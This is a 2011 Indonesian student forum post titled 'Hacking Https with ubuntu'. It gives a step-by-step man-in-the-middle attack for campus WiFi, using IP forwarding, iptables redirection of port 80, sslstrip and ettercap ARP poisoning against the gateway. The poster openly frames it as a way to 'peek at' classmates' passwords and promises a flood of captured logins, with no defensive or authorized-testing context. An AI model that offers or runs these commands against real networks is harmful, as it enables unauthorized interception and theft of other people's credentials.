POSS Politeknik Aceh
Welcome to POSS POLITEKNIK ACEH
<<=======================>>
You are currently viewing our boards as a guest, which gives you limited access to view most discussions and access our other features. By joining our free community, you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content, and access many other special features. Registration is fast, simple, and absolutely free.
POSS Politeknik Aceh
Welcome to POSS POLITEKNIK ACEH
<<=======================>>
You are currently viewing our boards as a guest, which gives you limited access to view most discussions and access our other features. By joining our free community, you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content, and access many other special features. Registration is fast, simple, and absolutely free.
POSS Politeknik Aceh
Would you like to react to this message? Create an account in a few clicks or log in to continue.
POSS Politeknik Aceh

Melihat sifat keterbukaan Linus Torvalds dengan memerdekakan source kernel buatannya, membuat terdorong hati nurani kami untuk Go OPEN SOURCE.......
 
IndeksLatest imagesPencarianPendaftaranLogin
Similar topics
Latest topics
» Dasar - Dasar Python
Hacking Https with ubuntu I_icon_minitimeThu Mar 15, 2012 2:29 am by Admin

» Pemograman java... hello.java
Hacking Https with ubuntu I_icon_minitimeWed Mar 07, 2012 8:49 pm by zack

» Cracking WEP Menggunakan Backtrack
Hacking Https with ubuntu I_icon_minitimeWed Oct 12, 2011 9:07 am by zack

» sedikit tentang array
Hacking Https with ubuntu I_icon_minitimeWed Oct 12, 2011 8:54 am by zack

» Cara mengembalikan data yang telah terformat diubuntu
Hacking Https with ubuntu I_icon_minitimeWed Oct 12, 2011 8:19 am by zack

» Dasar-dasar PHP 12: Penutup
Hacking Https with ubuntu I_icon_minitimeTue Jul 12, 2011 10:31 am by Admin

» Dasar-dasar PHP 11: Menguasai Fungsi (bag. 2)
Hacking Https with ubuntu I_icon_minitimeTue Jul 12, 2011 10:30 am by Admin

» Dasar-dasar PHP 11: Menguasai Fungsi (bag 1)
Hacking Https with ubuntu I_icon_minitimeTue Jul 12, 2011 10:26 am by Admin

» Dasar-dasar PHP 10 — Hula Loops
Hacking Https with ubuntu I_icon_minitimeTue Jul 12, 2011 10:20 am by Admin


 

 Hacking Https with ubuntu

Go down 
PengirimMessage
zack

zack


Jumlah posting : 67
Join date : 13.04.11

Hacking Https with ubuntu Empty
PostSubyek: Hacking Https with ubuntu   Hacking Https with ubuntu I_icon_minitimeThu Apr 14, 2011 1:20 am

buat temen2 yang di kampusnya ada Wifi-nya dan pengen sekali-kali buat ngintip password orang yang sedang login di port 80..mungkin bisa nyobain yang namanya hacking https. sebelum anda melakukan hacking https atau yang biasa kita sebut sniffing? anda perlu menginstall terlebih dahulu package ettercap dengan menggunakan apt or ubuntu sofwere center dan sebuah package sslstrip yang bisa di download di sini. OK saya anggap anda telah menginstall ettercap-ng dan sslstrip nya..? Let's Play...!!

pertama kita berikan nilai 1 untuk menjalankan ip_forwad nya.ketikan perintah di bawah ini.
view plainprint?

1. root@bara-laptop:/# echo 1 > /proc/sys/net/ipv4/ip_forward
2. root@bara-laptop:/# nano /etc/etter.conf


root@bara-laptop:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bara-laptop:/# nano /etc/etter.conf



#---------------
# Linux
#---------------

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hilangkan tanda commentar pada iptables sehingga menjadi seperti ini.

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

save dan kemudian keluar dari editor nano.

copy atau ketikan perintah di bawah ini untuk melakukan setting terhadap port yang nnt akan kita hack.

view plainprint?

1. root@bara-laptop:/# iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport
2.
3. #ubah menjadi seperti ini
4.
5. <span style="font-weight: bold;">root@bara-laptop:/# iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 10000</span>


root@bara-laptop:/# iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport

#ubah menjadi seperti ini

root@bara-laptop:/# iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 10000


NB : untuk %iface sesuaikan dengan milik anda.

selanjutnya jalankan sslstrip-nya.
view plainprint?

1. root@bara-laptop:/# sslstrip -a -f -k


root@bara-laptop:/# sslstrip -a -f -k


sslstrip 0.6 by Moxie Marlinspike running...

untuk keterangan options pada sslstrip anda bisa melihat di sslstrip -h

setelah itu jalankan ettercep anda dengan menggunkanan perintah di bawah ini.

view plainprint?

1. root@bara-laptop:/# ettercap -i wlan0 -Tq -M ARP:REMOTE -P autoadd /192.168.108.1/ //


root@bara-laptop:/# ettercap -i wlan0 -Tq -M ARP:REMOTE -P autoadd /192.168.108.1/ //


untuk 192.168.108.1 sesuaikan dengan ip gatewey milik anda.

di jamin klo anda akan kebanjiran password ( klo banyak yang login.hhe )....
Kembali Ke Atas Go down
 
Hacking Https with ubuntu
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Ubuntu Linux OpenSSH Server installation and configuration
» Black Desktop Theme di Ubuntu 9.10
» Mengembalikan Grub yang Hilang Ubuntu 10.4

Permissions in this forum:Anda tidak dapat menjawab topik
POSS Politeknik Aceh :: UNIX :: LINUX-
Navigasi: